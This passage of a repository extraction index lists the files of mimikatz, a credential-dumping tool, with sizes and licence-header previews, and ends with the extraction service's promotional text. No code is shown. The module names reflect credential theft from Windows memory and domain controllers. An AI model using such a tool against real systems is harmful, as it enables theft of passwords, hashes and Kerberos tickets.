"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_lsadump.c",
"chars": 111061,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_lsadump.h",
"chars": 19894,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_lsadump_remote.c",
"chars": 5348,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_lsadump_remote.h",
"chars": 2990,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_minesweeper.c",
"chars": 11708,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_minesweeper.h",
"chars": 1618,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_misc.c",
"chars": 87892,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_misc.h",
"chars": 7576,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_net.c",
"chars": 33227,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_net.h",
"chars": 1319,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_privilege.c",
"chars": 2831,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_privilege.h",
"chars": 1913,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_process.c",
"chars": 12007,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_process.h",
"chars": 2674,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_rdm.c",
"chars": 1402,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_rdm.h",
"chars": 364,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_rpc.c",
"chars": 16950,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\nhttps://blog.gentilkiwi.com\r\nbenjamin@gentilkiwi.com\r\nLicence : https://creativecommons."
},
{
"path": "mimikatz/modules/kuhl_m_rpc.h",
"chars": 950,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_service.c",
"chars": 6246,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_service.h",
"chars": 1377,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_service_remote.c",
"chars": 5941,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_service_remote.h",
"chars": 1130,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_sid.c",
"chars": 13715,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\nhttps://blog.gentilkiwi.com\r\nbenjamin@gentilkiwi.com\r\nLicence : https://creativecommons."
},
{
"path": "mimikatz/modules/kuhl_m_sid.h",
"chars": 958,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_sr98.c",
"chars": 19248,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_sr98.h",
"chars": 1530,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_standard.c",
"chars": 9119,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_standard.h",
"chars": 1219,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_sysenvvalue.c",
"chars": 7543,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_sysenvvalue.h",
"chars": 2219,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_token.c",
"chars": 11290,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_token.h",
"chars": 1528,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_ts.c",
"chars": 23808,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_ts.h",
"chars": 8011,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_vault.c",
"chars": 26931,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_vault.h",
"chars": 6170,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c",
"chars": 123907,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\r\n\tVincent LE TOUX\r\n\thttp://ping"
},
{
"path": "mimikatz/modules/lsadump/kuhl_m_lsadump_dc.h",
"chars": 5913,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\r\n\tVincent LE TOUX\r\n\thttp://ping"
},
{
"path": "mimikatz/modules/misc/kuhl_m_misc_citrix.c",
"chars": 5692,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/misc/kuhl_m_misc_citrix.h",
"chars": 1297,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/misc/kuhl_m_misc_djoin.c",
"chars": 13460,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/misc/kuhl_m_misc_djoin.h",
"chars": 1527,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/ngc/kuhl_m_ngc.c",
"chars": 25604,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/ngc/kuhl_m_ngc.h",
"chars": 2736,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/crypto/kuhl_m_sekurlsa_nt5.c",
"chars": 16426,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/crypto/kuhl_m_sekurlsa_nt5.h",
"chars": 3906,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/crypto/kuhl_m_sekurlsa_nt6.c",
"chars": 11527,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/crypto/kuhl_m_sekurlsa_nt6.h",
"chars": 2410,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/globals_sekurlsa.h",
"chars": 3703,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c",
"chars": 65113,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.h",
"chars": 8132,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_sk.c",
"chars": 7813,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_sk.h",
"chars": 987,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c",
"chars": 10350,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.h",
"chars": 7186,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c",
"chars": 5099,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h",
"chars": 3509,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_credman.c",
"chars": 4083,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_credman.h",
"chars": 2610,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_dpapi.c",
"chars": 5765,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_dpapi.h",
"chars": 786,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c",
"chars": 42888,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h",
"chars": 17274,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_livessp.c",
"chars": 2620,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_livessp.h",
"chars": 1067,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.c",
"chars": 9375,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.h",
"chars": 4544,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_ssp.c",
"chars": 3535,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_ssp.h",
"chars": 791,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_tspkg.c",
"chars": 3729,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_tspkg.h",
"chars": 1363,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_wdigest.c",
"chars": 3972,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_wdigest.h",
"chars": 706,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz.sln",
"chars": 10647,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio 2012\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-"
},
{
"path": "mimilib/kappfree.c",
"chars": 1074,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimilib/kcredentialprovider.c",
"chars": 8589,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\n\thttps://blog.gentilkiwi.com\n\tbenjamin@gentilkiwi.com\n\n\tVincent LE TOUX\n\thttp://pingcastl"
},
{
"path": "mimilib/kcredentialprovider.h",
"chars": 4118,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\n\thttps://blog.gentilkiwi.com\n\tbenjamin@gentilkiwi.com\n\n\tVincent LE TOUX\n\thttp://pingcastl"
},
{
"path": "mimilib/kdhcp.c",
"chars": 1943,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimilib/kdhcp.h",
"chars": 656,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimilib/kdns.c",
"chars": 801,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimilib/kdns.h",
"chars": 690,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimilib/kfilt.c",
"chars": 2966,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimilib/kfilt.h",
"chars": 2115,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimilib/knp.c",
"chars": 1403,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimilib/knp.h",
"chars": 477,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimilib/kssp.c",
"chars": 2127,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimilib/kssp.h",
"chars": 779,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimilib/ksub.c",
"chars": 1786,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\r\n\tVincent LE TOUX\r\n\thttp://ping"
},
{
"path": "mimilib/ksub.h",
"chars": 612,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\r\n\tVincent LE TOUX\r\n\thttp://ping"
}
]
// ... and 161 more files (download for full content)
About this extraction
This page contains the full source code of the gentilkiwi/mimikatz GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 361 files (11.2 MB), approximately 3.0M tokens, and a symbol index with 7902 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.